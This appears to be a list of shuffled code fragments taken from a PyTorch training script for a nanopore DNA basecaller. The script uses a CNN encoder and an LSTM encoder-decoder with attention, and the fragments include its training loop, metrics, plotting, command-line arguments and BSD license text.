"sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) #",
"of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on",
"dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]])",
"parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o',",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3,",
"batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim =",
"epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch",
"loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import",
"optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters')",
"\\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(),",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON",
"import PdfPages import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader",
"labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length",
"import numpy as np import os import sys import torch import torch.nn as",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR",
"end], ord=2) # cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2,",
"LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout",
"= {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc =",
"import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import",
"random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens,",
"loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train))",
"args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir =",
"parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int,",
"* hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def",
"accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings",
"end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate",
"sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf()",
"dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder",
"= n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER",
"b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2",
"sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:,",
"y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases,",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer",
"np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD:",
"print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr,",
"open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf,",
"early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates",
"matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data import Dataset,",
"hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self):",
"LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() >",
"= {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 =",
"equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of",
"labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ###########################################",
"= 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val",
"ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD:",
"hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port)",
"out_dim) --> (batch_size, out_dim) #decide if we are going to use teacher forcing",
"fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\")",
"cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions",
"labels so that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0,",
"print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint,",
"seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :,",
"batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap",
"type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) #",
"= fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\")",
"size = 11 start = time.time() out12 = trainNet( model12, train_ds = train_set,",
"= ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target)",
"= {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val =",
"input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden)",
"checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname))",
"end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in",
"Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\")",
"y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches, :, :]",
"float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch",
"# editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates %",
"argmax of prediction #if teacher forcing, use actual next token as next input",
"{}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc=",
"input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len",
"rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder #",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional:",
"epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f}",
"label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax =",
"# Sort instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len,",
"materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence",
"in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch",
"lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation",
"help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in",
"dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train",
"data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable object",
"* 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: #",
"fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\")",
"shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx,",
"val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0",
"THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,",
"= max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f =",
"hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch,",
"cy = (forgetgate * c) + (ingate * cellgate) hy = outgate *",
"batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0:",
"input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get",
"100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update=",
"or without modification, are permitted provided that the following conditions are met: 1.",
"SOS token] for i in max_for: # Stop looping if we got to",
"unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder #",
"batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional",
"2) # input for LSTM batch_size x seq_length x input_size #### LSTM if",
"trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None,",
"for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad()",
"padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item()",
"= [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val,",
"batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call",
"[batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of",
"sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True)",
"= torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader =",
"def __eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser =",
"\"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) *",
"valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0",
"teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### ####",
"batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): #",
"plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig =",
"layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1,",
"hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) #",
"plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label",
"f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight",
"this list of conditions and the following disclaimer. 2. Redistributions in binary form",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end =",
"dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1]",
"/ float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher",
"= hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12",
"= sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] #",
"beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[",
"name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out",
"nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1)",
"time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" *",
"25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the",
"output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not",
"= old_ed # # old_ed = ed2 # epoch_editd += ed # running_editd_train",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings",
"import pandas as pd import argparse from distutils.util import strtobool from polyleven import",
"dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) #",
"train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x,",
"make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem",
"self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden state",
"if we got to the last element in the batch if i ==",
"are going to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio",
"with or without modification, are permitted provided that the following conditions are met:",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train,",
"x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm",
"= lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must",
"your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset",
"#0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias =",
"= np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val",
"reproduce the above copyright notice, this list of conditions and the following disclaimer",
"cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is",
"+= ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if",
"f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has",
"model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0",
"the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\")",
"Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int,",
"sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val =",
"\"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length in",
"outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self,",
"val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\",",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax =",
"Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index =",
"# (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to use",
"for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1:",
"print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \",",
"seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll,",
"teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses =",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax",
"name and \"lstm\" in name and \"linear\" not in name: for b in",
"in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\",",
"batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random()",
"of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early",
"length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx",
"# [batch size] is typically chosen between 1 and a few hundreds, e.g.",
"#dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates]",
"updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration",
"train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def",
"= val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs",
"# batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label =",
"default=1000, help=\"Make every n updates evaluation on the validation set\") # CNN arguments",
"binary forms, with or without modification, are permitted provided that the following conditions",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\")",
"plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))),",
"5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script",
"= encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch, features,",
"OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
"batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your",
"model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12,",
"torchvision import pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker",
"token = 1 [batch size, SOS token] for i in max_for: # Stop",
"]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y,",
"= Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name,",
"bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size =",
"forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer #",
"= svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train,",
"plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4]",
"= nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class,",
"value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher,",
"output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout =",
"hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked,",
"{} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {}",
"Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) #",
"Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val =",
"cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(),",
"SummaryWriter import itertools import seaborn as sns import pandas as pd import argparse",
"early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch]",
"# [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim)",
"torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1: \"C\", 2:",
"label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of",
"have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio",
"def __init__(self, start, end): self.start = start self.end = end def __eq__(self, other):",
"editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"in p and \"lstm\" in p and \"linear\" not in p: n =",
"np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\",",
"hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes,",
"bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False,",
"if teacher_force else onehot # [batch size, out dim] return outputs, hidden #",
"#256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on =",
"Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4,",
"type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if",
"n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES",
"= (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size,",
"tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10,",
"self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File",
"{0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" +",
"= args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop =",
